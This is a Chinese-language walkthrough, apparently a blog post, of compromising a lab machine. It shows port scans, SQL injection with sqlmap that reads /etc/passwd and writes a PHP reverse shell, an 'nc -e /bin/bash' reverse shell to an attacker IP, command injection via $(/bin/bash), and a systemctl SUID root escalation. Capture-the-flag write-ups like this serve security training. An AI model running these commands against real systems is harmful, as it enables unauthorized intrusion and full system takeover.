信息收集
tcp开放端口扫描
# Nmap 7.93 scan initiated Wed Jan 10 10:33:35 2024 as: nmap -v --min-rate 10000 -p- -oA tcp_open_port 10.129.229.137
Increasing send delay for 10.129.229.137 from 0 to 5 due to 2006 out of 6686 dropped probes since last increase.
Warning: 10.129.229.137 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.129.229.137 from 640 to 1000 due to 2215 out of 7382 dropped probes since last increase.
Nmap scan report for 10.129.229.137
Host is up (0.78s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
64999/tcp open unknown
Read data files from: /usr/bin/../share/nmap
# Nmap done at Wed Jan 10 10:34:10 2024 -- 1 IP address (1 host up) scanned in 34.87 seconds
udp开放端口扫描
# Nmap 7.93 scan initiated Wed Jan 10 10:34:10 2024 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 10.129.229.137
Nmap scan report for 10.129.229.137
Host is up (0.20s latency).
Not shown: 65515 open|filtered udp ports (no-response)
PORT STATE SERVICE
7753/udp closed unknown
8197/udp closed unknown
8734/udp closed unknown
10119/udp closed unknown
12198/udp closed unknown
18588/udp closed unknown
22826/udp closed unknown
24343/udp closed unknown
25717/udp closed unknown
35935/udp closed unknown
36523/udp closed unknown
39133/udp closed unknown
42613/udp closed unknown
43102/udp closed unknown
44636/udp closed unknown
45508/udp closed unknown
50026/udp closed unknown
50287/udp closed unknown
50789/udp closed unknown
63480/udp closed unknown
开放端口服务扫描
# Nmap 7.93 scan initiated Wed Jan 10 10:36:54 2024 as: nmap -v -sC -sT -sV -O -p22,80,64999, -oA open_port_service 10.129.229.137
Nmap scan report for 10.129.229.137
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 03f34e22363e3b813079ed4967651667 (RSA)
| 256 25d808a84d6de8d2f8434a2c20c85af6 (ECDSA)
|_ 256 77d4ae1fb0be151ff8cdc8153ac369e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)
64999/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.25 (Debian)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.12 (94%), Linux 3.13 (94%), Linux 3.16 (94%), Linux 3.18 (94%), Linux 3.8 - 3.11 (94%), Linux 4.4 (94%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Jan 10 10:35:22 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 10 10:37:25 2024 -- 1 IP address (1 host up) scanned in 31.13 seconds
可以看到开放了TCP的22,80,64999端口,22端口为ssh服务,80和64999都是http服务,且中间件版本都一样,为Apache httpd 2.4.25,这里暂时不清楚它们是否提供同样的服务,先记下来。
getshell
80端口
打开后看到一个提供酒店服务的网页,看首页源码,一眼就相中了这个迷人的URL
http://logger.htb//room.php?cod=2,典型的sql注入URL格式,
试试①http://logger.htb//room.php?cod=2,②http://logger.htb//room.php?cod=2-,③http://logger.htb//room.php?cod=2-- +,发现①③结果一致,②和①③不同,因此猜测有sql注入。然后order by 得到表字段数为7,进行到http://logger.htb//room.php?cod=2 union select 1,2,3,4,5,6,7-- +时页面未发现有数字字样,就给sqlmap自动跑了。
将请求保存到文件中,然后
sqlmap -r inject.req --batch --level=5 --risk=3
跑出数据库的用户名和密码hash,sqlmap自动撞库得到明文密码为imissyou,因为看源码的过程中使用gobuster进行目录爆破,知道未有登录页面,以及sqlmap跑出来当前库没有用户相关表,因此猜测攻击向量为文件写入。
先验证是否有文件读取功能,
sqlmap -r inject.req --batch --level=5 --risk=3 --file-read /etc/passwd
得到靶机/etc/passwd文件信息
sqlmap -r inject.req --batch --level=5 --risk=3 --file-read /var//www/html/index.php
得到网站首页源码,也知道网站根目录为/var/www/html
写入一句话木马到文件中,然后上传到靶机上。
sqlmap -r inject.req --batch --level=5 --risk=3 --file-write php-reverse-shell.php --file-dest /var/www/html/2.php
连接: 
然后反弹shell到kali上,kali监听 9001端口
rlwrap nc -lvnp 9001
浏览器输入反弹shell语句
nc -e /bin/bash 10.10.16.21 9001
提权
www-data ->pepper
使用python或者script提示shell的交互性
python3 -c 'import pty;pty.spawn("/bin/bash")'
或/usr/bin/script -qc /bin/bash /dev/null
sudo -l 查看是否有提权命令,发现能够以pepper用户权限且无需密码执行/var/www/Admin-Utilities/simpler.py文件,
查看脚本内容,执行ping命令处引人注目
可以看到仅过滤有限的字符,像$()就没过滤,因此可以使用$(/bin/bash)进行bypass
新获得的shell是没有回显的,可以再次反弹完善shell
pepper ->root
查看是否有suid文件
find / -type f -perm -u=s 2>/dev/null
发现有/bin/systemctl 
查找GTFOBins,systemctl | GTFOBins,发现有suid的提权方法,执行
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF然后查看/bin/bash的属性已经有s
最后/bin/bash -p ,成功!
个人总结
这个靶机不难,但走的弯路需要记录下来。
①sqlmap注入写入文件时,最开始使用的是kali自带的php-reverse-shell.php文件,执行命令之后去浏览器访问发现没有上传成功,又没看sqlmap打印出来的信息,以为/var/www/html/不能写入文件,去找其他攻击向量;最后还是试遍其他可能,没有攻击向量了,想着这个是不是能一步步排查,先上传仅有test字符的1.txt文件,浏览器能够成功访问,然后手写php一句话木马,继续上传成功才发现是文件过大造成上传失败!
②网站根目录确认,当时是先找apache的配置文件,但其实可以先验证是否为常用的/var/www/html目录,如果不是再去找aache的配置文件,毕竟后者更容易验证,性价比更高!
431
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
